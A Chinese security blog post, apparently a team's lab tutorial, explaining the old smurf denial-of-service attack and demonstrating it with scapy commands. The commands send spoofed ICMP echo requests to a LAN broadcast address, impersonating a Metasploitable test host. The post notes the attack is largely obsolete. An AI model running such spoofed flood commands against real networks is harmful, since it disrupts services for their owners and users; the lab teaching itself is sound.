拒绝服务——smurf

admin 2022年10月29日16:15:01评论22 views字数 620阅读2分4秒阅读模式


拒绝服务——smurf


smurf 


  • 世界上最古老的DDoS攻击

  • 向广播地址发送伪造源地址的 ICMP echo Request (ping)包

  • 局域网内攻击者向网络广播地址发送ICMP包,并将回复地址设置成受害网络的广播地址,通过ICMP应答请求数据包来淹没受害主机

  • 对现代操作系统几乎无效(不响应目标为广播的ping)


服务器metasploitable
IP:192.168.1.119 


攻击者kali

scapy>>> i=IP()>>> i.display()>>> i.src="192.168.1.119">>> i.dst="192.168.1.255">>> p=ICMP()>>> p.display()>>> r=send(i/p)# 使用一行发送:send(IP(dst="192.168.1.255",src="192.168.1.119")/ICMP(),count=100,verbose=1)123456789 

结语
这个主要是了解下 毕竟没有实用性了





   红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。


© Honker Security Commando


原文始发于微信公众号(中龙 红客突击队):拒绝服务——smurf

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月29日16:15:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   拒绝服务——smurfhttp://cn-sec.com/archives/1379458.html

发表评论

匿名网友 填写信息